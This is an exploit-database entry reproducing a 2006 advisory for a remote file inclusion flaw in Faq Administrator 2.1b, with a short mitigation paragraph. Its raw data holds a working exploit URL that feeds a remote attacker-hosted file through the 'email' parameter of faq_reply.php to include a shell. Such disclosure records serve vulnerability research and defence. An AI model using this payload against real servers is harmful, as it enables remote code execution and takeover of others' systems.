header-logo
Suggest Exploit
vendor:
Faq Administrator
by:
v1per-haCker
9,3
CVSS
HIGH
Remote File Inclusion (RFI)
98
CWE
Product Name: Faq Administrator
Affected Version From: 2.1b
Affected Version To: 2.1b
Patch Exists: NO
Related CWE: N/A
CPE: a:campbus:faq_administrator
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Faq Administrator (RFI)

The Faq Administrator script is vulnerable to a Remote File Inclusion (RFI) vulnerability. An attacker can exploit this vulnerability by sending a malicious URL in the 'email' parameter of the faq_reply.php script. This will allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

The best way to mitigate RFI vulnerabilities is to restrict the types of files that can be included in a script. Additionally, input validation should be used to ensure that the input is valid and does not contain malicious code.
Source

Exploit-DB raw data:

#==================================================================
#  Faq Administrator (RFI)
#==================================================================
# Info:-
#
# Scripts:  Faq Administrator
# http://www.campbus.com/downloads/faqadmin/faqadmin-current.tgz
# Version : 2.1b
# Dork & vuln : download scripts and think :)
#Note : if the shell included stop the page and do your work :)
#==================================================================
#Exploit :
#
#http://localhost/path/faq_reply.php?email=http://EvElCoDe.txt?
#
#==================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to :| abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL |
#                 ThE-WoLf-KsA | mohandko | fooooz | maVen | fucker_net |
#            metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota |
#And all members in XP10_hackEr Team
#Thanx to str0ke :)
#WWW.XP10.COM
#
#==================================================================

# milw0rm.com [2006-10-29]

Navigation

Suggest Exploit

Services By CQR